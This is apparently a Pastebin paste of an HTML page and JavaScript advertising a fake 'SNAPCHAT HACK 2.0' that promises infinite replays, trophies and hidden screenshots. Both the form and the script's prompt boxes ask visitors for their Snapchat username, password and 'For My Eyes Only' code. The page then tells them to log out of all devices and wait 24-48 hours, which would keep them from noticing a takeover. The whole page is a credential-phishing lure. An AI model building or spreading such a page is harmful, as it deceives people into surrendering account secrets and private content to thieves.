Guest User

Untitled

a guest
Oct 30th, 2017
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.64 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <meta charset="utf-8">
  5. <meta name="viewport" content="width=device-width">
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7. <title>repl.it</title>
  8. <link href="index.css" rel="stylesheet" type="text/css" />
  9. <style>
  10. body {background-color:yellow;}
  11. text {color:black;}
  12. h2 {
  13. font-size: 76%;
  14. }
  15. </style>
  16. </head>
  17. <body>
  18. <h1 style="text-align:center">SNAPCHAT HACK 2.0</h1>
  19. <hr>
  20. <br><br>
  21. <h2 style="text-align:center">Infite Replays</h2>
  22. <br><br>
  23. <h2 style="text-align:center">All Trophies</h2>
  24. <br><br>
  25. <h2 style="text-align:center">Sneaky Screenshots</h2>
  26. <hr>
  27. <form action="/action_page.php">
  28. Username:<br>
  29. <input type="text" name="username" value="">
  30. <br><br>
  31. Password:<br>
  32. <input type="text" name="password" value="">
  33. <br><br>
  34. For My Eyes Only:<br>
  35. <input type="text" name="fmeo" value="">
  36. <br><br>
  37. <input type="submit" value="Submit">
  38. </form>
  39.  
  40.  
  41.  
  42.  
  43.  
  44. </body>
  45. </html>
  46.  
  47. alert('SNAPCHAT HACK 2.0, PLEASE ENTER YOUR SNAPCHAT INFORMATION IN THE FOLLOWING PROMPT BOXES.'); var username = prompt("What is your username"); var password = prompt("What is your password"); var fmeo = prompt("What is your *For My Eyes Only* code"); alert('nUsername: '+username+'nPassword: '+password+'nFor My Eyes Only: '+fmeo+'nnIf all of the above information is correct, please log out of your snapchat account on all devices and give us 24-48 hours to apply the hack, including screenshotting images without your friend getting notified, infinite replays, all trophies, and more! Thank you!nn Sincerely,n THE SNAP HACKERS');
Add Comment
Please, Sign In to add comment